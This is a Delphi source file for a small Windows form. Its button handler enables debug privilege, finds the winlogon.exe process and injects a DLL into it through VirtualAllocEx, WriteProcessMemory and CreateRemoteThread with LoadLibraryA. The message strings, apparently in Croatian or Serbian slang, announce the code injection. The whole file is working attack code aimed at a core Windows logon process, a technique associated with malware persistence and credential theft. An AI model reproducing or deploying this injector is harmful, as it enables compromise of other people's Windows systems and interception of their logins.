unit Unit2;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls,Tlhelp32;

type
  TForm2 = class(TForm)
    Button1: TButton;
    procedure Button1Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form2: TForm2;

implementation

{$R *.dfm}

const SE_DEBUG_NAME='SeDebugPrivilege';
const BlockSize = $200;

procedure TForm2.Button1Click(Sender: TObject);
var hSnapHandle:THandle;
    lpProcE:TProcessEntry32;

    hToken:THandle;
    sedebugnameValue:TLargeInteger;
    tkp, ptkpPrev:TOKEN_PRIVILEGES;
    bRet:Boolean;
    ulRet:ULONG;

    _handleWL:THandle;
    _exitCode:DWORD;



  procHandle   : THandle;
  RemoteTID    : Cardinal;
  BaseAddress  : pointer;
  BytesWritten : Cardinal;
  ADLL:String;


begin


if not OpenProcessToken(GetCurrentProcess(),
        TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken) then
     ShowMessage('problem...');

    bRet:=LookupPrivilegeValue( Nil, SE_DEBUG_NAME, sedebugnameValue);
    if not bRet then
        CloseHandle(hToken);
  

    tkp.PrivilegeCount:= 1;
    tkp.Privileges[0].Luid:=sedebugnameValue;
    tkp.Privileges[0].Attributes:=SE_PRIVILEGE_ENABLED;

  ptkpPrev:=tkp;
    bRet:=AdjustTokenPrivileges(hToken,FALSE,&tkp,sizeof(TOKEN_PRIVILEGES),ptkpPrev,ulRet);

    CloseHandle(hToken);



hSnapHandle:=CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);
if hSnapHandle<>0 then
begin
  if Process32First(hSnapHandle, lpProcE)=true then
    begin
       while Process32Next(hSnapHandle, lpProcE) do
        begin
          procHandle := OpenProcess(PROCESS_ALL_ACCESS, FALSE, lpProcE.th32ProcessID);
        if lpProcE.szExeFile='winlogon.exe' then
          begin
           ShowMessage('Sad cu injectovat kod!!! :P');

  ADLL:='c:\moj_dll1.dll';

  If procHandle = 0 Then
    Exit;
  BaseAddress := VirtualAllocEx(procHandle, nil, BlockSize, MEM_COMMIT, PAGE_READWRITE);
  If BaseAddress = nil Then
  Begin
    ShowMessage('Sranje!');
    CloseHandle(procHandle);
    Exit;
  End;
  If (not WriteProcessMemory(procHandle, BaseAddress, @ADLL[1], BlockSize, BytesWritten)) or
     (BytesWritten<>BlockSize) Then
  Begin
    ShowMessage('Nece..');
    CloseHandle(procHandle);
    Exit;
  End;

  CreateRemoteThread(procHandle, nil, 0, GetProcAddress(GetModuleHandle(kernel32), 'LoadLibraryA'), BaseAddress, 0,RemoteTID);
  CloseHandle(procHandle);



          end;
        end;
    end;
end;
end;

end.